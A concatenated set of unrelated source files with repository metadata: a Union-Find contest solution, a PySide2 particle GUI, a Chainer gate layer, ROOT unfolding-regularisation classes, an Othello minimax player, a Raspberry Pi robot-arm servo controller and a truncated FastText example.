class UnionFind: def __init__(self, n): self.par = [-1]*n self.siz = [1]*n #経路圧縮あり def root(self, x): if self.par[x] == -1: return x self.par[x] = self.root(self.par[x]) return self.par[x] #経路圧縮なし """ def root(self, x): if self.par[x] == -1: return x return self.root(self.par[x]) """ def unite(self, x, y): rx = self.root(x) ry = self.root(y) if rx == ry: return False if self.size(rx) < self.size(ry): rx, ry = ry, rx self.par[ry] = rx self.siz[rx] += self.siz[ry] return True def same(self, x, y): return self.root(x) == self.root(y) def size(self, x): return self.siz[self.root(x)] #解答の方針 #全部結んだ後の(木の根の数 - 1)が答えになります。 #setで管理すると楽なのでsetで管理します。 n, m = map(int, input().split()) uf = UnionFind(n) for i in range(m): a, b = map(int, input().split()) a -= 1 b -= 1 uf.unite(a, b) se = set() for i in range(n): se.add(uf.root(i)) print(len(se) - 1)
yuyu5510/Union-Find
code/Python/ARC032B.py
ARC032B.py
py
1,216
python
ja
code
1
github-code
6
11691605009
import imp import re from PySide2.QtWidgets import QMainWindow from PySide2.QtCore import Slot from ui_mainwindow import Ui_MainWindow from particulasact.particula import Particula from particulasact.index import Nodo, Lista_ligada class MainWindow(QMainWindow): def __init__(self): super(MainWindow, self).__init__() self.lista_ligada = Lista_ligada() self.ui = Ui_MainWindow() self.ui.setupUi(self) self.ui.agregarFinal_pushButton.clicked.connect( self.click_agregarFinal) self.ui.agregarInicio_pushButton.clicked.connect( self.click_agregarInicio) self.ui.mostrar_pushButton.clicked.connect(self.click_mostrar) def creadorDeParticulas(self): destinoX = self.ui.destinoX_spinBox.value() origenX = self.ui.origenX_spinBox.value() destinoY = self.ui.destinoY_spinBox.value() origenY = self.ui.origenY_spinBox.value() velocidad = self.ui.velocidad_spinBox.value() red = self.ui.red_spinBox.value() green = self.ui.green_spinBox.value() blue = self.ui.blue_spinBox.value() return Particula(self.lista_ligada.no_elements+1, origenX, origenY, destinoX, destinoY, velocidad, red, green, blue) @Slot() def click_mostrar(self): self.ui.salida.clear() self.ui.salida.insertPlainText(str(self.lista_ligada)) @Slot() def click_agregarFinal(self): particula = self.creadorDeParticulas() nodo = Nodo(particula) self.lista_ligada.agregar_final(nodo) self.ui.salida.clear() self.ui.salida.insertPlainText("Agregado al Final") """ self.ui.salida.insertPlainText( f"ID:{particula.id}\nOrigen X:{particula.origen_x}\nDestino X: {particula.destino_x}\nOrigen Y:{particula.origen_y}\nDestino Y: {particula.destino_y}\nVelocidad: {particula.velocidad}\nDistancia:{particula.distancia}\nRed: {particula.red}\nGreen: {particula.green}\nBlue: {particula.blue}") """ @Slot() def click_agregarInicio(self): particula = self.creadorDeParticulas() nodo = Nodo(particula) self.lista_ligada.agregar_inicio(nodo) self.ui.salida.clear() self.ui.salida.insertPlainText("Agregado al Inicio")
arturos8617/actividad06
mainwindow.py
mainwindow.py
py
2,290
python
es
code
0
github-code
6
41746506951
# -*- coding:utf-8 -*- import os os.environ["CHAINER_TYPE_CHECK"] = "0" import numpy as np import chainer import chainer.functions as F import chainer.links as L from chainer import cuda, Variable from chainer.initializers import GlorotNormal class SelectiveGate(chainer.Chain): def __init__(self, hidden_size): super(SelectiveGate, self).__init__( xh=L.Linear(in_size=None,out_size=hidden_size,initialW=GlorotNormal(),nobias=True), hh=L.Linear(in_size=None,out_size=hidden_size,initialW=GlorotNormal(),nobias=True), ) self.hidden_size = hidden_size def __call__(self,batch_seq_h, batch_h,enable): batch_size = batch_seq_h.shape[0] seq_size = batch_seq_h.shape[1] matp = F.expand_dims(self.xh(batch_h), axis=1) matp = F.broadcast_to(matp, (batch_size, seq_size, self.hidden_size)) ab = F.reshape(batch_seq_h,(batch_size * seq_size, -1)) wab = self.hh(ab) wab = F.reshape(wab, (batch_size, seq_size, -1)) sGate=F.sigmoid(wab + matp) enable = F.expand_dims(enable, axis=2) enable = F.broadcast_to(enable, sGate.shape) sGate = F.where(enable, sGate, self.xp.zeros(sGate.shape, dtype=self.xp.float32)) return batch_seq_h*sGate
rn5l/session-rec
algorithms/RepeatNet/base/selective_gate.py
selective_gate.py
py
1,280
python
en
code
362
github-code
6
5679963414
""" Classes to be used when determining regularisation in unfolding """ from __future__ import print_function, division from array import array import numpy as np import math import os from itertools import chain import ROOT from MyStyle import My_Style from comparator import Contribution, Plot My_Style.cd() import common_utils as cu import qg_common as qgc import qg_general_plots as qgp # This doesn't seem to work...sigh np.set_printoptions(edgeitems=3,infstr='Infinity', linewidth=75, nanstr='nan', precision=8, suppress=False, threshold=1000, formatter=None) ROOT.PyConfig.IgnoreCommandLineOptions = True ROOT.gROOT.SetBatch(1) ROOT.TH1.SetDefaultSumw2() class TauScanner(object): """Class to handle doing ScanTau on a TUnfoldBinning object, since it produces many associated objects & values. Can also plot results from scanning. """ def __init__(self): self.scan_results = ROOT.MakeNullPointer(ROOT.TSpline) self.l_curve = ROOT.MakeNullPointer(ROOT.TGraph) self.log_tau_x = ROOT.MakeNullPointer(ROOT.TSpline) self.log_tau_y = ROOT.MakeNullPointer(ROOT.TSpline) self.tau = 0 self.scan_mode = "" self.graph_all_scan_points = None self.graph_best_scan_point = None def scan_tau(self, tunfolder, n_scan, tau_min, tau_max, scan_mode, distribution, axis_steering): ind_best_point = tunfolder.ScanTau(n_scan, tau_min, tau_max, self.scan_results, scan_mode, distribution, axis_steering, self.l_curve, self.log_tau_x, self.log_tau_y) self.tau = tunfolder.GetTau() self._process_results(scan_mode, ind_best_point) print("scan_tau value is {}".format(self.tau)) print("chi**2 A {:3.1f} + chi**2 L {:3.1f} / NDOF {:3.1f} ".format(tunfolder.GetChi2A(), tunfolder.GetChi2L(), tunfolder.GetNdf())) return self.tau def _process_results(self, scan_mode, ind_best_point): """Create graphs etc from ScanTau output User shouldn't call this, only internal """ # Get best scan point & make graph of it # t here is log_10(tau) t, rho = array('d'), array('d') # array obj needed to make TGraph t0 = ROOT.Double(0.0) rho0 = ROOT.Double(0.0) self.scan_results.GetKnot(ind_best_point, t0, rho0) t.append(t0) rho.append(rho0) self.graph_best_scan_point = ROOT.TGraph(1, t, rho) print("t[0] =", t[0]) print("rho[0] =", rho[0]) print("10^log_10(tau) = tau =", math.pow(10., float(t0))) # Make graph of all the points scanned t_all, rho_all = array('d'), array('d') n_scan = self.scan_results.GetNp() for i in range(n_scan): tt = ROOT.Double(0.0) rr = ROOT.Double(0.0) self.scan_results.GetKnot(i, tt, rr) t_all.append(tt) rho_all.append(rr) self.graph_all_scan_points = ROOT.TGraph(int(n_scan), t_all, rho_all) tau_mode_dict = { ROOT.TUnfoldDensity.kEScanTauRhoAvg: "average (stat+bgr) global correlation (#rho)", ROOT.TUnfoldDensity.kEScanTauRhoAvgSys: "average (stat+bgr+sys) global correlation (#rho)", ROOT.TUnfoldDensity.kEScanTauRhoMax: "maximum (stat+bgr) global correlation (#rho)", ROOT.TUnfoldDensity.kEScanTauRhoMaxSys: "maximum (stat+bgr+sys) global correlation (#rho)", ROOT.TUnfoldDensity.kEScanTauRhoSquareAvg: "average (stat+bgr) global correlation (#rho) squared", ROOT.TUnfoldDensity.kEScanTauRhoSquareAvgSys: "average (stat+bgr+sys) global correlation (#rho) squared", } self.graph_all_scan_points.SetTitle("Optimization of Regularization Parameter, #tau : Scan of {}".format(tau_mode_dict[scan_mode])) def plot_scan_tau(self, output_filename): """Plot graph of scan results, and optimum tau""" canv_tau_scan = ROOT.TCanvas("canv_tau_scan_"+str(self.tau), "canv_tau_scan_"+str(self.tau)) self.graph_all_scan_points.SetLineColor(ROOT.kBlue+3) self.graph_all_scan_points.Draw() self.graph_best_scan_point.SetMarkerColor(ROOT.kRed) self.graph_best_scan_point.Draw("* same") self.graph_all_scan_points.GetXaxis().SetTitle("log_{10}(#tau)") self.graph_all_scan_points.GetYaxis().SetTitle(" #rho") leg = ROOT.TLegend(0.2, 0.6, 0.35, 0.89) leg.SetFillColor(0) leg.SetFillStyle(0) leg.SetBorderSize(0) leg.SetTextSize(0.026) leg.AddEntry(self.graph_all_scan_points, 'Scan over #tau', 'l') leg.AddEntry(self.graph_best_scan_point, 'Chosen point: #tau = {}'.format(self.tau), 'P') leg.Draw() cu.check_dir_exists_create(os.path.dirname(os.path.abspath(output_filename))) canv_tau_scan.Print(output_filename) def save_to_tfile(self, tfile): tfile.WriteTObject(self.graph_all_scan_points, "regularize_all_scan_points") tfile.WriteTObject(self.graph_best_scan_point, "regularize_best_scan_point") class LCurveScanner(object): """Class to handle doing ScanLcurve on a TUnfoldBinning object, since it produces many associated objects & values. Can also plot results from scanning. """ def __init__(self): self.scanned_l_curve = ROOT.MakeNullPointer(ROOT.TGraph) self.log_tau_x = ROOT.MakeNullPointer(ROOT.TSpline3) # spline of L-curve x-coord as a func of log_10(tau) self.log_tau_y = ROOT.MakeNullPointer(ROOT.TSpline3) # spline of L-curve y-coord as a func of log_10(tau) self.log_tau_curvature = ROOT.MakeNullPointer(ROOT.TSpline3) self.graph_log_tau_curvature = None # to hold graph of log_tau_curvature self.graph_log_tau_curvature_best = None self.tau = 0 self.graph_best_scan_point = None # in terms of LcurveY vs LcurveX def scan_L(self, tunfolder, n_scan, tau_min, tau_max): ind_best_point = tunfolder.ScanLcurve(n_scan, tau_min, tau_max, self.scanned_l_curve, self.log_tau_x, self.log_tau_y, self.log_tau_curvature) self.tau = tunfolder.GetTau() self._process_results(ind_best_point) return self.tau def _process_results(self, ind_best_point): """Create graphs etc from ScanLcurve output User shouldn't call this, only internal """ # Get best scan point & make graph of it t_0 = ROOT.Double(0.0) # is log_10(tau) x_0 = ROOT.Double(0.0) y_0 = ROOT.Double(0.0) self.log_tau_x.GetKnot(ind_best_point, t_0, x_0) self.log_tau_y.GetKnot(ind_best_point, t_0, y_0) self.graph_best_scan_point = ROOT.TGraph(1, array('d', [x_0]), array('d', [y_0])) # Create graph of curvature t_all, c_all = array('d'), array('d') n_scan = self.log_tau_curvature.GetNp() for i in range(n_scan): t = ROOT.Double(0.0) # is log_10(tau) c = ROOT.Double(0.0) self.log_tau_curvature.GetKnot(i, t, c) t_all.append(t) c_all.append(c) self.graph_log_tau_curvature = ROOT.TGraph(n_scan, t_all, c_all) # Get best scan point in terms of curvature vs log(tau) # you cannot use the index, it doesn't correspond to this graph c_0 = self.log_tau_curvature.Eval(t_0) self.graph_log_tau_curvature_best = ROOT.TGraph(1, array('d', [t_0]), array('d', [c_0])) def plot_scan_L_curve(self, output_filename): """Plot graph of scan results, and optimum tau""" canv_L_scan = ROOT.TCanvas("canv_L_scan_"+str(self.tau), "canv_L_scan_"+str(self.tau)) self.scanned_l_curve.SetTitle("Optimization of Regularization Parameter, #tau : Scan of L curve") self.scanned_l_curve.SetLineColor(ROOT.kBlue+3) self.scanned_l_curve.Draw() self.graph_best_scan_point.SetMarkerColor(ROOT.kRed) self.graph_best_scan_point.Draw("* same") self.scanned_l_curve.GetXaxis().SetTitle("log_{10}(L_{1})") self.scanned_l_curve.GetYaxis().SetTitle("log_{10}(#frac{L_{2}}{#tau^{2}})") leg = ROOT.TLegend(0.5, 0.6, 0.85, 0.89) leg.SetFillColor(0) leg.SetFillStyle(0) leg.SetBorderSize(0) leg.SetTextSize(0.026) leg.AddEntry(self.scanned_l_curve, 'Scan over #tau', 'l') leg.AddEntry(self.graph_best_scan_point, 'Chosen point: #tau = {}'.format(self.tau), 'P') leg.Draw() cu.check_dir_exists_create(os.path.dirname(os.path.abspath(output_filename))) canv_L_scan.Print(output_filename) def plot_scan_L_curvature(self, output_filename): """Plot graph of L curvature & optimum point""" canv_L_curvature = ROOT.TCanvas("canv_L_curvature_"+str(self.tau), "canv_L_curvature_"+str(self.tau)) self.graph_log_tau_curvature.SetTitle("Optimization of Regularization Parameter, #tau : Scan of L curvature") self.graph_log_tau_curvature.SetLineColor(ROOT.kBlue+3) self.graph_log_tau_curvature.Draw() self.graph_log_tau_curvature.GetXaxis().SetTitle("log_{10}(#tau)") self.graph_log_tau_curvature.GetYaxis().SetTitle("L-curve curvature C") self.graph_log_tau_curvature_best.SetLineColor(ROOT.kRed) self.graph_log_tau_curvature_best.SetMarkerColor(ROOT.kRed) self.graph_log_tau_curvature_best.Draw("* same") leg = ROOT.TLegend(0.5, 0.6, 0.85, 0.89) leg.SetFillColor(0) leg.SetFillStyle(0) leg.SetBorderSize(0) leg.SetTextSize(0.026) leg.AddEntry(self.graph_log_tau_curvature, 'Curvature', 'l') leg.AddEntry(self.graph_log_tau_curvature_best, 'Chosen point: #tau = {}'.format(self.tau), 'P') leg.Draw() cu.check_dir_exists_create(os.path.dirname(os.path.abspath(output_filename))) canv_L_curvature.Print(output_filename) def save_to_tfile(self, tfile): tfile.WriteTObject(self.scanned_l_curve, "scanned_l_curve") tfile.WriteTObject(self.graph_best_scan_point, "graph_best_scan_point") tfile.WriteTObject(self.graph_log_tau_curvature, "graph_log_tau_curvature") tfile.WriteTObject(self.graph_log_tau_curvature_best, "graph_log_tau_curvature_best")
raggleton/QGAnalysisPlotting
unfolding_regularisation_classes.py
unfolding_regularisation_classes.py
py
11,065
python
en
code
0
github-code
6
14637889375
black, white, empty, outer = 1, 2, 0, 3 directions = [-11, -10, -9, -1, 1, 9, 10, 11] class TreeNode: val = None left = None right = None def __init__(self, val, left, right): self.val = val self.left = left self.right = right def setLeft(l): self.left = l def setRight(r): self.right = r def setVal(v): self.val = v def getLeft(): return left def getRight(): return right def getVal(): return val def mobility(board,player): return len(get_legal_moves(board,opponent_color(player))) def stableCount(board, player): count = 0 for square in board: if isStable(board, player, square): count = count + 1 return count def isStable(board, player, square): opp = opponent_color(player) for d in directions: k = square + d while board[k] != 3: if board[k] == 0 or board[k] == opp: test = k-d while board[test] != 3: if board[test] == 0 or board[test] == opp: return False test = test-d k = k + d return True def bracket(board, player, square): opp = opponent_color(player) for d in directions: k = square + d if board[k] is not opp: continue while board[k] is opp: k = k + d if board[k] is player: k = k - d while k != square: board[k] = player k = k - d def would_bracket(board, player, square): opp = opponent_color(player) for d in directions: k = square + d if board[k] is not opp: continue while board[k] is opp: k = k + d if board[k] is player: return True return False def get_legal_moves(board, player): possible = [] for row in range(10, 90, 10): for col in range(1, 9): square = row + col if board[square] is not empty: continue if would_bracket(board, player, square): possible.append(square) return possible def opponent_color(player): if player is black: return white return black def pick(board,player): poss = get_legal_moves(board,player) maxscore = 0 from random import choice if len(poss) < 1: return None move = choice(poss) for child in poss: test = board test[child] = player bracket(test, player, child) h = minimax(test,player,10,stableCount) if h > maxscore: maxscore = h move = child if h == 0: for child in poss: test = board test[child] = player bracket(test, player, child) h = minimax(test,player,10,mobility) if h > maxscore: maxscore = h move = child return move def minimax(board,player,depth,score): if depth == 0: return score(board,player) else: h = -9999 poss = get_legal_moves(board,player) for child in poss: a = 0 if child in [12,16,21,22,27,28,71,72,77,78,82,87]: a = -1 test = board test[child] = player bracket(test, player, child) h = max(h+a, -minimax(test,opponent_color(player),depth-1,score)) return h
caelan/TJHSST-Artificial-Intelligence
Othello/JasmineDragon.py
JasmineDragon.py
py
2,788
python
en
code
0
github-code
6
44914350526
#!/usr/bin/env python3 #/* # Terminal User input # Manual Mode where the coordinate and orientation variables are input # Doesn't use accelerometer #*/ # Import essential libraries import requests #type: ignore import numpy as np #type: ignore import imutils #type: ignore import time import math from datetime import datetime import adafruit_adxl34x # type: ignore import sys import cv2 #type: ignore import os import RPi.GPIO as GPIO #type: ignore import serial #type: ignore import matplotlib.pyplot as plt #type: ignore sys.path.append('/home/pi/Chromebook-projects/projects/proj_Hexclaw') from IK_module import * from h2_module import * from board import SCL, SDA # type: ignore import busio # type: ignore from adafruit_motor import servo # type: ignore from adafruit_servokit import ServoKit # type: ignore from adafruit_pca9685 import PCA9685 # type: ignore i2c = busio.I2C(SCL, SDA) pca = PCA9685(i2c) pca.frequency = 50 servo = [servo.Servo(pca.channels[0]), servo.Servo(pca.channels[1]), servo.Servo(pca.channels[2]), servo.Servo(pca.channels[3]), servo.Servo(pca.channels[4]), servo.Servo(pca.channels[5]), ] for i in range(6): servo[i].set_pulse_width_range(500, 2500) sendToServo(servo,[135,45,180,45,180,90],0,mode=0) time.sleep(1) GPIO.setmode(GPIO.BCM) # GPIO Numbers instead of board numbers ledRelay = 23 GPIO.setup(ledRelay, GPIO.OUT) # GPIO Assign mode GPIO.output(ledRelay, GPIO.LOW) # out GPIO.output(ledRelay, GPIO.HIGH) # on time.sleep(0.75) sendToServo(servo,[90,115,135,90,115,90],1,mode=2) if False: for _ in range(4): GPIO.output(ledRelay, False) time.sleep(0.03) GPIO.output(ledRelay, True) time.sleep(0.03) time.sleep(1.5) GPIO.output(ledRelay, False) time.sleep(0.25) GPIO.output(ledRelay, True) time.sleep(0.5) GPIO.output(ledRelay, False) time.sleep(0.1) GPIO.output(ledRelay, True) time.sleep(2) GPIO.output(ledRelay, False) print("------") time.sleep(2) GPIO.output(ledRelay, True) diagnostics = False if diagnostics: ard_port = '/dev/ttyUSB0' ser_arduino = serial.Serial(ard_port, 9600, timeout=0.1) ser_arduino.reset_input_buffer() x_Values = [] #time/seconds passed since start of program y0_Values = [] #voltage y1_Values = 6*[[]] #absolute rotation difference/jump for each *individual motor* y2_Values = [] #total absolute rotation difference (i.e. the "jump" in movement for that iteration) y3_Values = 6*[[]] #*estimated* stagnant load on each motor (Nm) GraphTitles = ["Voltage","new rotation","total new rotation","torque per motor"] Graph_yLabel = ["Voltage [V]","Angle [degrees]","Angle [degrees]","Torque [Nm]"] axisFilter = 0.7 #On the new value end xScaling, yScaling, zScaling = 0.8, 0.8, 1.2 brightVal = 75 diffCheck = 100 showImage = False globalPrint = True endAnglePrint = False firstAnglePrint = False posOption = '-' q = [0]*6 #NOTE: q = q[0] = servo[0] s = [0, 0, 0, 0, 0, 0, 0] #The variables that are sent to the servos zMax = 300 a, b, Y = toRadians(0), toRadians(-45), toRadians(90) PP = [0, 200, 200] coord = "" drawing = False # true if mouse is pressed buttonPressed = False x1,y1,x2,y2 = -1,-1,-1,-1 windowRes = (600,300) # mouse callback function def mouseTrack(event,x,y,flags,param): global x1,y1,x2,y2,drawing,buttonPressed,img,temp x2,y2 = x,y if drawing: img = np.zeros((windowRes[1],windowRes[0],3), np.uint8) if event == cv2.EVENT_LBUTTONDOWN: drawing = True x1,y1 = x2,y2 elif event == cv2.EVENT_MOUSEMOVE: buttonPressed = True if drawing == True: cv2.line(img,(0,y2),(windowRes[0],y2),(255,255,255),1) cv2.line(img,(x2,0),(x2,windowRes[1]),(255,255,255),1) cv2.circle(img,(x2,y2),10,(0,0,255),1) cv2.putText(img,"("+str(int(x2-windowRes[0]*0.5))+","+str(int(windowRes[1]-y2))+")",(x2+10,y2),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255)) cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),50,(255,255,255),1) cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),100,(255,255,255),1) cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),150,(255,255,255),1) cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),200,(255,255,255),1) cv2.putText(img,str(PP),(10,20),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255)) temp = img elif event == cv2.EVENT_LBUTTONUP: buttonPressed = False drawing = False img = temp #type: ignore # cv2.line(img,(0,y2),(windowRes[0],y2),(255,255,255),1) # cv2.line(img,(x2,0),(x2,windowRes[1]),(255,255,255),1) # cv2.circle(img,(x2,y2),10,(0,0,255),1) # cv2.putText(img,"("+str(int(x2-windowRes[0]*0.5))+","+str(int(windowRes[1]-y2))+")",(x2+10,y2),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255)) def main(): global PP, a, b, Y mode = 0 mod_code = "q4" print(" Different modes for tracking/moving:") print(" 0. Run movement commands from .dat file") print(" 1. Enter position and orientation in terminal") print(" 2. Mouse position tracking on window") print(" 3. Move end-effector in a pattern") option = input(" input: ") if option == "exit": return else: mode = int(option) # "under" = given < 0 # "over" = given < 180 servoExceeded = False whichServoExceeded = 6*[False] typeOfExceeded = 6*["null"] start_time = time.time() x = 1 # displays the frame rate every 1 second counter = 0 while True: # os.system("clear") print("\n ---Enter mode_(n) to change mode to (n)--- ") print(" - \"debug\" to enter debug-mod menu") print(" - \"mode_(n)\" to change mode to n") PP = [0, 200, 200] while True: isReachable = [True] if mode==0: tempInput_1 = input("Enter file path:") if tempInput_1 == "exit": return elif tempInput_1[:4] == "mode": mode=int(tempInput_1[5:]) else: movCommPath = tempInput_1 runFromFile(movCommPath, servo) break if mode==1: tempInput_1 = input("Enter coordinates [x y z] in mm: ").split() if tempInput_1[0] == "exit": return elif tempInput_1[0][:4] == "mode": mode=int(tempInput_1[0][5:]) elif tempInput_1[0] == "debug": debug_mod_menu(mod_dict) else: PP[0] = (float(tempInput_1[0])) # type: ignore PP[1] = (float(tempInput_1[1])) # type: ignore PP[2] = (float(tempInput_1[2])) # type: ignore break if mode==2: tempInput_1 = input("Enter z-value in mm: ") if tempInput_1 == "exit": return elif tempInput_1[:4] == "mode": mode=int(tempInput_1[5:]) elif tempInput_1 == "debug": debug_mod_menu(mod_dict) else: PP[2] = float(tempInput_1) # type: ignore break if mode==3: patternOpt = 1 print("Options:") print(" 0.run a custom program/course of motions") print(" 1.choose a pre-defined pattern from a dictionary") print(" 2.move end-effector along an axis") print(" 3.move end-effector orientation with a fixed position") tempInput_1 = input("input: ") if tempInput_1 == "exit": return elif tempInput_1[:4] == "mode": mode=int(tempInput_1[5:]) elif tempInput_1 == "debug": debug_mod_menu(mod_dict) else: patternOpt = int(tempInput_1) break if mode==1: tempInput_2 = input("Enter orientation values [a b Y] in degrees: ").split() a,b,Y = toRadians(float(tempInput_2[0])), toRadians(float(tempInput_2[1])), toRadians(float(tempInput_2[2])) if diagnostics: print("x:", PP[0], " y:", PP[1], " z:", PP[2], " a:", toDegrees(a), " b:", toDegrees(b), " Y:", toDegrees(Y), sep='') q = getAngles(PP,a,b,Y,'-', debug=mod_dict, positionIsReachable=isReachable) # print(q) print("read:",[toDegrees(q) for q in q], "posIsReachable:", isReachable) if isReachable[0]: # custom_sendToServo(servo,[toDegrees(angle) for angle in q],0,True) sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=2,printResult=True) elif mode==2: tempInput_2 = input("Enter orientation values [a b Y] in degrees: ").split() a,b,Y = toRadians(float(tempInput_2[0])), toRadians(float(tempInput_2[1])), toRadians(float(tempInput_2[2])) img = np.zeros((windowRes[1],windowRes[0],3), np.uint8) cv2.namedWindow('tracking_window') cv2.setMouseCallback('tracking_window',mouseTrack) temp = img print("\n 'Esc' - change z-value and orientation\n") while True: cv2.imshow('tracking_window', img) #use this if the previous drawings are not to be used k = cv2.waitKey(1) & 0xFF if k == 27: break elif k == 119: PP[2]+=10 #type: ignore elif k == 115: PP[2]-=10 #type: ignore if drawing: PP[0], PP[1] = x2-windowRes[0]*0.5,windowRes[1]-y2 # type: ignore q = getAngles(PP,a,b,Y,'-',positionIsReachable=isReachable, debug=mod_dict) # print(q) if isReachable[0]: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=0) counter+=1 if (time.time() - start_time) > x : print("FPS: ", counter / (time.time() - start_time)) counter = 0 start_time = time.time() cv2.destroyAllWindows() elif mode==3: if patternOpt==0: #type: ignore print("Pick any of these programs") for key,_ in mov_Programs.items(): print(" - \"",key,"\"", sep='') key = input("input the program name: ") if key=="exit": break presetAngles = 6*[0] for joint in range(6): presetAngles[joint] = servo[joint].angle / constants_q[joint]["fixed"] if key=="axisTest" and diagnostics: mov_Programs[key]( servo, [diagnostics,x_Values, [y0_Values,y1_Values,y2_Values,y3_Values],ser_arduino] ) else: mov_Programs[key](servo) sendToServo(servo,presetAngles,0,mode=2) if diagnostics and key=="axisTest": fig = plt.figure(figsize=(19, 6)) ax = [0,0,0,0] y_Values = [y0_Values,y1_Values,y2_Values,y3_Values] for axis in range(len(ax)): ax[axis] = fig.add_subplot(1,4,axis+1) #type: ignore ax[axis].set_xlim(0,round(x_Values[-1])) #type: ignore ax[axis].set_title(GraphTitles[axis]) #type: ignore ax[axis].set_xlabel("time [seconds]") #type: ignore ax[axis].set_ylabel(Graph_yLabel[axis]) #type: ignore ax[axis].grid() #type: ignore if axis==1 or axis==3: for j in range(6): ax[axis].plot(x_Values,y_Values[axis][j],linestyle='solid',label='q'+str(j+1)) #type: ignore else: ax[axis].plot(x_Values,y_Values[axis],linestyle='solid') #type: ignore if axis==0: ax[axis].axhline( #type: ignore y=(sum(y_Values[axis])/len(y_Values[axis])), color='red',linestyle='-', label=f"avg:{round(sum(y_Values[axis])/len(y_Values[axis]))}V" ) ax[axis].legend(loc='upper right',framealpha=0.3) #type: ignore fig.tight_layout(pad=5.0) fig.suptitle("") currentDate = str(datetime.now()).replace(" ", ";") relativePath = "/home/pi/Chromebook-projects/projects/proj_Hexclaw/hexclaw_files/voltage_readings/media/" fileTitle = "mov_Voltage_" plt.savefig(relativePath+fileTitle+currentDate+".png") #type: ignore plt.show() if patternOpt==1: #type: ignore print("Pick any of these patterns") for key,_ in mov_Patterns.items(): print(" - \"",key,"\"", sep='') key = input("input a key:") if key=="exit": break for i in range(len(mov_Patterns[key])): q = getAngles( [mov_Patterns[key][i][0],mov_Patterns[key][i][1],mov_Patterns[key][i][2]], toRadians(mov_Patterns[key][i][3]), toRadians(mov_Patterns[key][i][4]), toRadians(mov_Patterns[key][i][5]), '-', positionIsReachable=isReachable, debug=mod_dict ) print(mov_Patterns[key][i]) if isReachable[0]: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=2) time.sleep(1) elif patternOpt==2: #type: ignore axis = input("\nEnter what axis to move [x, y or z] [unit: mm]:") if axis=="exit": break orientToUse = input("\nEnter orientation for axis test [a, b and Y]:").split() fullPos = [0,link[4]+link[5]+120,150] presetAngles = [0,0,0,0,0,0] for joint in range(6): presetAngles[joint] = servo[joint].angle / constants_q[joint]["fixed"] prevSent=False for direction in range(1, -2, -2): for pos in range(-200, 200): if axis == "x": fullPos[0] = direction*pos*0.75 #type: ignore #300 if axis == "y": fullPos[1] = direction*pos*0.5+100 #type: ignore #200 if axis == "z": fullPos[2] = direction*pos*0.5+200 #type: ignore #200 q = getAngles( fullPos, toRadians(int(orientToUse[0])),toRadians(int(orientToUse[1])),toRadians(int(orientToUse[2])), '-', positionIsReachable=isReachable, debug=mod_dict ) if isReachable[0]: if prevSent: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=0) else: sendToServo(servo,[toDegrees(joint) for joint in q],2,useDefault=True,mode=2) time.sleep(1) prevSent=True if axis == "x": time.sleep(0.005) else: time.sleep(0.001) time.sleep(1.5) sendToServo(servo,presetAngles,0,mode=2) elif patternOpt==3: #type: ignore orientToUse = input("\nEnter what orientation to test [a, b or Y] [unit: degrees]:") posToUse = input("\nEnter coordinate for position test [x, y and z]:").split() for _ in range(3): posToUse[_] = int(posToUse[_]) #type: ignore fullOrient = [0,0,0] presetAngles = [0,0,0,0,0,0] for joint in range(6): presetAngles[joint] = servo[joint].angle / constants_q[joint]["fixed"] for direction in range(1, -2, -2): for angle in range(-90, 90): if orientToUse == "a": fullOrient[0] = direction*angle if orientToUse == "b": fullOrient[1] = direction*angle if orientToUse == "Y": fullOrient[2] = direction*angle q = getAngles(posToUse,toRadians(fullOrient[0]),toRadians(int(fullOrient[1])),toRadians(int(fullOrient[2])), '-',positionIsReachable=isReachable, debug=mod_dict ) if isReachable[0]: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=0) time.sleep(0.01) time.sleep(1.5) sendToServo(servo,presetAngles,0,mode=2) # input("\npaused. Press enter to continue...") if __name__ == "__main__": main() sendToServo(servo,[135,45,180,45,180,90],1,mode=2) GPIO.output(ledRelay, False) pca.deinit()
Quark3e/Chromebook-projects
projects/proj_Hexclaw/in rpi/Hexclaw_Main_2.py
Hexclaw_Main_2.py
py
17,353
python
en
code
2
github-code
6
27251458016
""" 文件名: Code/Chapter09/C05_FastText/main.py 创建时间: 2023/7/22 10:31 上午 作 者: @空字符 公众号: @月来客栈 知 乎: @月来客栈 https://www.zhihu.com/people/the_lastest """ import logging from gensim.models import KeyedVectors import fasttext from fasttext.util import reduce_model import sys import os sys.path.append('../../') from utils import DATA_HOME def load_fasttext_model(): path_to_model = os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.300.bin') # path_to_model = os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.300.vec.gz') # model = KeyedVectors.load_word2vec_format(path_to_model, binary=False) ft = fasttext.load_model(path_to_model) logging.info(f"词向量的维度: {ft.get_dimension()}") logging.info(f"中国: {ft.get_word_vector('中国')}") logging.info(f"与中国最相似的5个词为: {ft.get_nearest_neighbors('中国', k=5)}") logging.info(ft.get_subwords("跟我一起学深度学习")) reduce_model(ft, 100) # 降维 logging.info(f"词向量的维度: {ft.get_dimension()}") path_to_model = os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.100.bin') ft.save_model(path_to_model) def get_get_analogies(): ft = fasttext.load_model(os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.300.bin')) logging.info('有凤来仪' in ft.words) logging.info(f"与东坡居士最相似的5个词为: {ft.get_nearest_neighbors('有凤来仪', k=5)}") logging.info(ft.get_analogies("柏林", "德国", "法国", k=5)) # False # 与有凤来仪最相似的5个词为: [(0.457183, 'Viscosity'), (0.454175, 'viscosity'), (0.361536, 'thb'), (0.343013, 'kg/m2'), (0.335760, 'Dirham')] # [(0.743810, '巴黎'), (0.583832, '里昂'), (0.555544, '法國'), (0.547275, '斯特拉斯堡'), (0.536760, '坎城')] ft = fasttext.load_model(os.path.join(DATA_HOME, 'Pretrained', 